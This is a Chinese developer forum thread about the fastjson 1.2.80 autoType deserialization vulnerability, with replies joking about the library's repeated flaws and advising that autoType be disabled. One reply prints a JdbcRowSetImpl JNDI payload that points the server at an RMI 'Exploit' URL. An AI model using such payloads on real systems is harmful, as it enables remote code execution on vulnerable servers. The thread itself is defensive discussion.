近日 Fastjson Develop Team 发现 fastjson 1.2.80 及以下存在新的风险,请关注。 fastjson 已使用黑白名单用于防御反序列化漏洞,经研究该利用在特定条件下可绕过默认 autoType 关闭限制,攻击远程服务器,风险影响较大。建议 fastjson 用户尽快采取安全措施保障系统安全。
这个影响是不是有点大。我司目前还在用 1.2.34 ( CSDN 都有复现教程了
但是我同时有点好奇,这些漏洞怎么样去利用的?有什么论坛是交流这些的吗
我是 web 开发,并非网络安全方向,所以不太懂
 |
1
ychost May 24, 2022  1
fastJSON 几乎所有的漏洞都和 autoType 有关,这玩意儿大部分都用不到,关了之后就没啥问题,它主要解决的是反序列化的类不确定,比如 {"@type":"com.abc.biz.Label","name":"","value":""},那么反序列化的时候就会去用 classLoader 加载 com.abc.biz.Label 这个类,如果这个类被故意攻击,用到了 jdbc 里面的类,然后就比较危险了,比如 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
就能加载远程 dataSource 了,个人建议能关 autoType 就关掉,想用的话开白名单模式 |
 |
2
golangLover May 24, 2022 via Android
没发现漏洞才是新闻吧。
还跟多国内文章推荐这个,害人不浅 |
 |
3
pengtdyd May 24, 2022
不知道是第 N 次听到出漏洞的消息了
|
 |
4
sagaxu May 24, 2022 1
这货有哪一年不出这类漏洞?
|
 |
5
yangyaofei May 24, 2022
@ychost 这个 type 貌似很多序列化库都有, 比如 jackson, 虽然但是, 我用 jackson...
|
 |
6
Greatshu May 25, 2022
现在还在用 fastjson 的一定是个加班爱好者
|
 |
7
DreamSaddle May 25, 2022
白学家:不会吧,不会吧,还有人敢用这玩意?
|
 |
8
chendy May 25, 2022
人生苦短,我选择 spring boot 默认的 hikari 和 fastjson ,能少配一点是一点
不过是代码就有漏洞,及时更新其实都没事 |
|
10
chendy May 25, 2022
@chendy @oneisall8955 上班摸鱼手滑了……
|
 |
12
potatowish May 25, 2022 via iPhone
默认自带的 jackson 它不香吗,为什么还要单独引入 fastjson
|
 |
13
0xfan May 25, 2022
累了,就这样吧,有漏洞就有吧,躺平了 [/狗头]
|
 |
14
f64by May 25, 2022 1
以前在 README 里写 gson 是龟 son 缩写的,就是 fastjson 干的吧
|
 |
15
xuanbg May 25, 2022
反序列化的时候不能确定目标类型的话,肯定是设计问题,只要完善设计,就可以规避这种问题了。所以,fastjson 这个 autoType 功能真的就是画蛇添足。
|
 |
17
AllenHua May 25, 2022
Fastjson 到底做错了什么?为什么会被频繁爆出漏洞? https://www.163.com/dy/article/FGV541KF05319WXB.html
[高危安全通告] fastjson≤1.2.80 反序列化漏洞 https://juejin.cn/post/7101506799387279396 |
|
18
AllenHua May 25, 2022
不过实际项目中,我挺喜欢用 fastjson 的啊(我是异类,狗头
|
 |
19
hhjswf May 25, 2022
5. 怎么判断是否用到了 autoType
看序列化的代码中是否用到了 SerializerFeature.WriteClassName 这东西基本没用到吧?管它呢,不升级。。 |
 |
20
dbpe May 25, 2022
唉..很多漏洞都是默认开启一些 xxx...实际上我们根本用不到....
|
Select Language